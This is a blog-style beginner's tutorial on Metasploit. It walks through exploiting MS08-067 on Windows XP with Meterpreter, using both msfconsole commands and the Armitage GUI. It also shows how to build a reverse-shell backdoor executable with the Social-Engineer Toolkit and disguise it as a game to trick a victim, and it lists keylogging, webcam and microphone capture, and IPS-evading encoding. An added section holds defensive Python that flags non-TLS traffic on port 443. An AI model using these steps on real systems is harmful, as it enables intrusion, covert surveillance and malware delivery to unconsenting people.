Beginner's Guide to Metasploit

Metasploit can run on Linux, Mac OS X and Windows. It offers both a command-line interface and a graphical user interface (GUI). The Metasploit Framework can be extended with external add-ons written in multiple languages, making it a very powerful tool. Metasploit can be used to test target systems for vulnerabilities, either to protect them or to break into them. Whether the use is legitimate or unauthorized, this clearly underlines the importance of security.

To exploit a system using the Metasploit Framework you carry out 5 steps:
1. Choose and configure a pre-loaded exploit from the database.
2. Check whether the target system is susceptible to the exploit.
3. Configure a payload.
4. Encode the payload in order to hide it from an intrusion-prevention system (IPS).
5. Execute the exploit.

In order to choose an exploit and a payload, you need information about the target. There are many ways to gather this information, from port scanning and OS fingerprinting tools such as Nmap to vulnerability scanners such as Nessus. I'll leave the method of information gathering up to you.


Installation



Installation of the Metasploit Framework depends on your operating system and hardware, so rather than list every way to install it and cover all eventualities, I have provided links to both the Windows and Linux installations:

Windows: LINK...
Linux: LINK...

I would, however, highly recommend downloading Kali Linux, which comes with Metasploit Pro already installed.


Usage



Metasploit is a great tool and a must-have for all security/penetration testers. I will show you a few ways in which Metasploit can be used to exploit a target machine. (All my examples are done using Metasploit on Kali Linux, exploiting a Windows XP SP3 OS.)


Exploit ms08_067_netapi



This section shows how to connect to and exploit a target machine using the Metasploit exploit ms08_067_netapi. First, let's start Metasploit with the command msfconsole:

(Screenshot: Metasploit start)



Now we need to set up our Windows exploit with the following commands:
1. use exploit/windows/smb/ms08_067_netapi
2. set payload windows/meterpreter/bind_tcp
3. set RHOST 192.168.0.10 (this IP address will be your target's IP, gained from a scan)
4. exploit (this command carries out the exploit, as seen below)

All being well, you should now be connected to the target and able to carry out a number of commands. Below is the screenshot command.

And that's it, easy!!

There are loads of commands available under this exploit; just type help and a list will be displayed.
Examples are: recording audio from the microphone, taking screenshots from the webcam, gathering keystrokes and downloading files.


Social engineering example



Next, let's see how to gain access to a target's machine using their own interaction. Why? I hear you ask. Well, sometimes it's not possible to connect directly, for whatever reason; let's say "security settings". The following exploit uses the target's interaction to help us gain access.

So, first things first, bring up a terminal window and type the command: se-toolkit

Then enter option 1 for social engineering attacks.

Now choose option 4 to create a payload and listener, and enter your IP address.

Now you need to pick the type of payload; we will go with option 2 - Windows Reverse TCP Meterpreter.

Choose option 16 - Backdoor Executable.
Leave the port set to 443.
(This port is used for secure web browser communication. Data transferred across such connections is highly resistant to eavesdropping and interception, which is ironic considering what we are using it for, lol.)
And finally, start the listener.

OK, so let's recap: we have just created an executable file with a payload hidden inside it. The next part is a little tricky: you need to send the file to the target computer and get them to execute it. For example, call it games and give it a nice icon, lol.

Before you send the file, navigate to where it was created, right-click it and choose Properties.

Tick the box to allow the file to be executed as a program.

So now we wait... once the target executes the program you will see the following:

From here on in it's the usual meterpreter > prompt.
As before, you can now run commands like screenshot or shell.
The target is yours!
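As an added example that is not part of the original post, here is the defender's side of the port-443 remark above: a real TLS connection always begins with a ClientHello sent by the client, so a listener on 443 that speaks plain TCP stands out to anyone inspecting the first bytes of each connection. The flows below are constructed for the example, not real captures.

```python
# Added example (not from the original post). Flags connections to port 443
# whose first client-to-server bytes are not a TLS ClientHello. In TLS the
# client speaks first, so a flow where the server sends first (empty client
# bytes) or where the client sends non-TLS data is reported.

TLS_HANDSHAKE = 0x16      # TLS record content type: handshake
TLS_CLIENT_HELLO = 0x01   # handshake message type: ClientHello


def looks_like_tls_client_hello(first_bytes: bytes) -> bool:
    """True if the bytes start with a TLS record carrying a ClientHello.

    Record header: type (1), version (2), length (2); then the handshake
    header begins with the message type (1). Record versions in the wild are
    0x0300..0x0303 (SSL 3.0 through TLS 1.2; TLS 1.3 ClientHellos still use
    0x0301 or 0x0303 in the record header).
    """
    if len(first_bytes) < 6:          # too short, or server spoke first
        return False
    rec_type, major, minor = first_bytes[0], first_bytes[1], first_bytes[2]
    rec_len = int.from_bytes(first_bytes[3:5], "big")
    return (rec_type == TLS_HANDSHAKE and major == 0x03 and minor <= 0x03
            and rec_len > 0 and first_bytes[5] == TLS_CLIENT_HELLO)


def flag_non_tls_on_443(flows):
    """flows: (src_ip, dst_ip, dst_port, first_client_bytes) tuples.
    Returns the (src_ip, dst_ip) pairs that used 443 without a ClientHello."""
    return [(src, dst) for src, dst, port, data in flows
            if port == 443 and not looks_like_tls_client_hello(data)]


# Constructed sample flows (TEST-NET addresses, not real traffic):
SAMPLE_FLOWS = [
    # genuine HTTPS: record 16 03 01 005a, handshake type 01 (ClientHello)
    ("10.0.0.5", "198.51.100.20", 443, bytes.fromhex("160301005a0100005603030102")),
    # client connected to 443 and waited for the server to talk first
    ("10.0.0.7", "203.0.113.9", 443, b""),
    # client sent non-TLS bytes to 443
    ("10.0.0.8", "203.0.113.9", 443, b"\xde\xad\xbe\xef\x00\x01\x02\x03"),
    # plain HTTP on 80 is outside this check
    ("10.0.0.7", "203.0.113.9", 80, b"GET / HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for src, dst in flag_non_tls_on_443(SAMPLE_FLOWS):
        print(f"non-TLS traffic on 443: {src} -> {dst}")
```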



Armitage



We've seen how to use Metasploit via the command line; now let's see how to use Armitage, a graphical version that lets us achieve the same goal.

Armitage is a GUI way of using Metasploit/Meterpreter rather than the command line, so let's get started.

First navigate to Applications > Kali Linux > System Services > Metasploit > community / pro start. This will start the server/database.


Then type armitage in the terminal window and accept the default values:

You will probably get a popup asking to start Metasploit; click yes.
You should now see the following:

Don't worry about the "connection refused" message; it just takes a while to load.
Armitage will now boot up. If it asks you for the attack computer's IP, enter your IP address.
Navigate to the Hosts tab > Nmap Scan > Quick Scan (OS Detect).

From here Armitage will scan a range or a single IP address of your choice and present the results in the black window. Right-click the target and click Scan.

When the scan is complete, expand exploit > windows > smb and double-click ms08_067_netapi.

This will bring up an attack confirmation window; check the details and click Launch.

Confirmation of a successful exploit will look like this:

You can now right-click the target and perform multiple commands.

Here is an example of the Interact > "remote command shell" option:


Websploit



As an added extra, Websploit (below) uses exploits from Metasploit and also has its own features for scanning and analysing remote systems in order to find vulnerabilities. If you enjoyed this article, please comment and I will do one on Websploit. Thank you.



Summary



Metasploit is a must-have for anyone interested in the world of security. You have just seen a few ways in which it can be used; however, keep in mind that this has only scratched the surface of what this tool can do. To find out more, please follow the links below.


